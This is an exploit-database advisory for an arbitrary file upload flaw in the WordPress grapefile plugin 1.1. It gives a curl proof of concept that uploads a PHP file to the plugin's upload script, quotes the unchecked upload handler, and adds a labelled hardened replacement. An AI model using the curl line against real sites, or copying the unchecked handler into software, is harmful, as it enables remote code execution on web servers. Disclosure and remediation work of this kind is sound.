
WordPress Plugin grapefile 1.1 - Arbitrary File Upload

Author: Hrvoje Spoljar
type: webapps
platform: php
port: 
date_added: 2011-08-31 
date_updated: 2011-08-31 
verified: 0 
codes:  
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comgrapefile.zip

Title: WordPress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link: http://wordpress.org/extend/plugins/grapefile/

PoC:
curl -F "userfile=@mycode.php" http://domain.tld/wp-content/plugins/grapefile/grapeupload.php

File(s): grapeupload.php  grapeupload2.php  grapeupload3.php  grapeupload4.php
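Vulnerable code:
// Upload directory sits under the document root, so stored files are web-accessible.
$uploaddir = $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
// The client-supplied file name is kept as-is; basename() only strips directory parts.
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

// No extension or content-type check is made before the file is moved into place.
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  echo "success";
}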
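
A hardened counterpart to the handler above, added here as an example; it is not code from the plugin or from the advisory's author. The names ALLOWED, MAX_BYTES and store_upload(), the size limit, the accepted MIME strings and the storage path outside the document root are assumptions.

```php
<?php
// Added example: hypothetical names and limits, not taken from the plugin.
const ALLOWED = ['avi' => ['video/x-msvideo', 'video/avi', 'video/msvideo']];
const MAX_BYTES = 50 * 1024 * 1024;

/**
 * Validate one $_FILES entry and move it into $destDir under a
 * server-generated name. Returns the stored path, or null on rejection.
 */
function store_upload(array $file, string $destDir): ?string
{
    // Reject failed or partial uploads and anything PHP did not receive via POST.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        return null;
    }
    $size = $file['size'] ?? 0;
    if ($size <= 0 || $size > MAX_BYTES) {
        return null;
    }
    // Allowlist the extension instead of trusting the client file name.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // Derive the content type from the bytes, not from $_FILES[...]['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        return null;
    }
    // Server-chosen name: the client controls neither the name nor the extension.
    $target = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// The caller must authenticate and authorize the request before this point.
if (isset($_FILES['userfile'])) {
    // Assumed storage directory outside the document root (not web-accessible).
    $stored = store_upload($_FILES['userfile'], '/var/lib/grapefile/avi');
    http_response_code($stored === null ? 400 : 200);
    echo $stored === null ? 'rejected' : 'success';
}
```

If files must stay under the web root, the web server should also be configured not to execute scripts in the upload directory.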